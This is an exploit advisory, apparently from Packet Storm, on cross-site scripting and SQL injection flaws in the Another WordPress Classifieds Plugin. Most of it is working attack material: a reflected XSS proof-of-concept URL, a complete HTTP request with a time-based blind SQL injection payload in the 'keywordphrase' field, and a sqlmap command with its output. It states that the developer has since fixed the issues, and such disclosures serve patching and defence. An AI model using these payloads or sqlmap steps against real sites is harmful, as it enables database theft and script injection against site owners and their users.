Another WordPress Classifieds plugin suffers from cross site scripting and remote SQL injection vulnerabilities.
8e3cc50618209d35d2db5cfcfaea563a32e2c93be193dbca495188aee7164daeExploit Title: Another Wordpress Classifieds Plugin sql injection and Cross Site Scripting
Author: dill
download: https://wordpress.org/plugins/another-wordpress-classifieds-plugin/Client
Webpage: http://awpcp.com/
Issue number 1: Cross-site scripting (reflective)
Details:
An arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute and then encapsulated in double quotation marks. This is then echoed in the applications response.
Proof-of-Concept (PoC):
http://vulnerable.server/?page_id=16587&step=send-access-key&a40f8%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E76975=1
Issue number 2: SQL injection
Details:
The parameter “keywordphrase” is susceptible to a time-based blind SQL injection when doing a search for classifieds.
Proof-of-Concept (PoC)
Request:
POST /?page_id=16592 HTTP/1.1
Host: vulnerable.server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://vulnerable.server/?page_id=16592
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-1=1407957654; wp-settings-time-2=1408136814; PHPSESSID=uk871e0cssdnca8oesorbmg2b6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country®ions[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=state®ions[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=city®ions[0][city]=city
Exploit through sqlmap:
Copy post request to text file
sqlmap -r keywordphrase.txt -p keywordphrase --dbms=MySQL --level=5
-----------------
Place: POST
Parameter: keywordphrase
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country®ions[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=State®ions[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=City®ions[0][city]=City
Resolution: Developer was contacted and has since corrected the issues. Update to the latest version of the plugin
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed